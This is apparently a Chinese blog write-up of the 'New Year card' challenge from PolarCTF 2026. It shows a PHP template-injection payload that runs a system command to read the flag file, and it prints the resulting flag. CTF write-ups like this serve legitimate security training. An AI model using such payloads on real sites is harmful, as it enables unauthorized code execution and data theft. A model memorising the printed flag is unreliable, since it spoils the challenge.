技术栈

【PolarCTF2026年春季挑战赛】新年贺卡

大方子2026-03-29 15:30

添加一个恶意模板

复制代码
PHP代码中通过+来避免空格

<?php+system("cat+/flag*")?>

使用该模板制作贺卡

打开生成的贺卡

得到flag{09328acfbc035a4e69a710f71eab8a5c}

上一篇:Protobuf 环境搭建:Windows 与 Linux 系统安装教程
下一篇:告别 OSS 强制下载!阿里云 OSS 绑定自定义域名实现文件在线预览全记录
相关推荐
CDN360
2 小时前
CSDN 交流|360CDN 系列产品使用感受与避坑建议
运维·网络安全
CDN360
4 小时前
360CDN 产品实测合集:CDN / 高防 / SDK 游戏盾真实反馈
运维·游戏·网络安全
大方子
4 小时前
【PolarCTF2026年春季挑战赛】static
网络安全·polarctf
oi..
5 小时前
python Get/Post请求练习
开发语言·经验分享·笔记·python·程序人生·安全·网络安全
缘友一世
5 小时前
在 Kali Linux 2026 + GOAD v3 环境中安装 BloodHound
网络安全·kali·域渗透·goad
大方子
6 小时前
【PolarCTF2026年春季挑战赛】GET
网络安全·polarctf
一名优秀的码农
6 小时前
vulhub系列-42-Me-and-My-Girlfriend-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
大方子
6 小时前
【PolarCTF2026年春季挑战赛】狗黑子最后的起舞
网络安全·polarctf
℡ 萧
7 小时前
OSPF开销值、协议优先级及计时器的修改-新版(17)
网络·网络协议·网络安全·智能路由器·信息与通信
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09中国象棋-html版本10Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南